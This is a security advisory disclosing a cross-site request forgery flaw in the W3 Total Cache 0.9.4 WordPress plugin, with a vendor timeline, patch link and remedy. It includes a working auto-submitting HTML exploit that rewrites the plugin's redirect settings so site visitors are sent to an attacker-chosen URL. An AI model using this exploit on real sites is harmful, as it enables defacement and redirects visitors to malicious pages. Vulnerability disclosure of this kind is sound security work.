# Title: W3TotalFail: W3 Total Cache v 0.9.4 CSRF Vulnerability that Leads to Full Deface
# Author: Mazin Ahmed
##
# Date of Discovering: October 6th, 2014
# Date of Reporting to the Vendor: October 7th, 2014
# Date of Releasing a Patch: December 9th, 2014
##
# Vulnerability Type: Cross-Site Request Forgery (CSRF) - CWE-352
##
# Vendor Homepage: https://www.w3-edge.com/
##
# Affected Version: 0.9.4, previous versions might be vulnerable as well.
# Affected Software Link: https://downloads.wordpress.org/plugin/w3-total-cache.0.9.4.zip
# Patch Link: https://downloads.wordpress.org/plugin/w3-total-cache.0.9.4.1.zip
# Tested on: Wordpress 4.0
# Blog Post: http://mazinahmed1.blogspot.com/2014/12/w3-total-caches-w3totalfail.html
####

###Description:
W3 Total Cache v0.9.4 is vulnerable to a critical Cross-Site Request Forgery issue. It occurs because of the invalidation of the CSRF token "_wpnonce". This CSRF issue can be used to perform many actions, but the most significant action that has the biggest impact on users is redirecting users to malicious websites. This can be happened by using the feature of specify particular user-agents to be redirected to mobile site. By crafting an exploit that forces the victim to change the policy feature's policy to redirect every user who visit the victim's website to be redirected to a specific website that is specified by the attacker. This can be done by adding all the common keywords that is used on user-agents.

###Exploit:
------------------------------------------------------------------------------------------------------------------------------
<html>
		 <body onload="javascript:document.csrf_form.submit()"> 
	<form method="post" action="http://localhost/wordpress/wp-admin/admin.php?page=w3tc_mobile" name="csrf_form"> 
<input type="hidden" name="mobile_groups[exploit_by_mazen160][enabled]" value="0">
<input type="hidden" name="mobile_groups[exploit_by_mazen160][enabled]" value="1">
<input type="hidden" name="mobile_groups[exploit_by_mazen160][theme]" value="">
<input type="hidden" name="mobile_groups[exploit_by_mazen160][redirect]" value="https://twitter.com/mazen160">
<input type="hidden" name="mobile_groups[exploit_by_mazen160][agents]" value="Mozilla
Opera
iTunes
ELinks
Links 
Konqueror
Midori
Uzbl (Webkit 1.3)
w3m
Lynx
POLARIS
nook
BlackBerry
LG
MOT
Nokia
SEC
Sony
Baiduspider
Google
msnbot
Email
Gaisbot
grub
Download
Wget
curl">
<input type="hidden" name="_wp_http_referer=" value="http://localhost/wordpress/wp-admin/admin.php?page=w3tc_mobile">
<input type="hidden" name="w3tc_save_options" value="Save+all+settings"/>
<input type="hidden" name="_wpnonce" value=""> 
<input type="hidden" name="w3tc_note" value="config_save"> 
	</form>
		</body> 
</html>
------------------------------------------------------------------------------------------------------------------------------

###Vulnearble Versions:
The issue has been confirmed on W3 Total Cache (v0.9.4). Previous versions might be vulnerable as well.

###Severity: Critical 

###Steps to Reproduce:
1- An attacker uploads the exploit to an accessible server 
2- The attacker sends a link of the exploit to the victim (who is using W3 Total Cache) 
3- The victim clicks on the link (while he is authenticated), and the exploit run on the victim's client-side 
4- The victim's website settings will be changed, and anyone who visits the victim's website will be redirected to the attacker's malicious website. 

###Remedy:
Update W3 Total Cache plugin to the latest version.

Best Regards,
Mazin Ahmed
https://twitter.com/mazen160
http://mazinahmed1.blogspot.com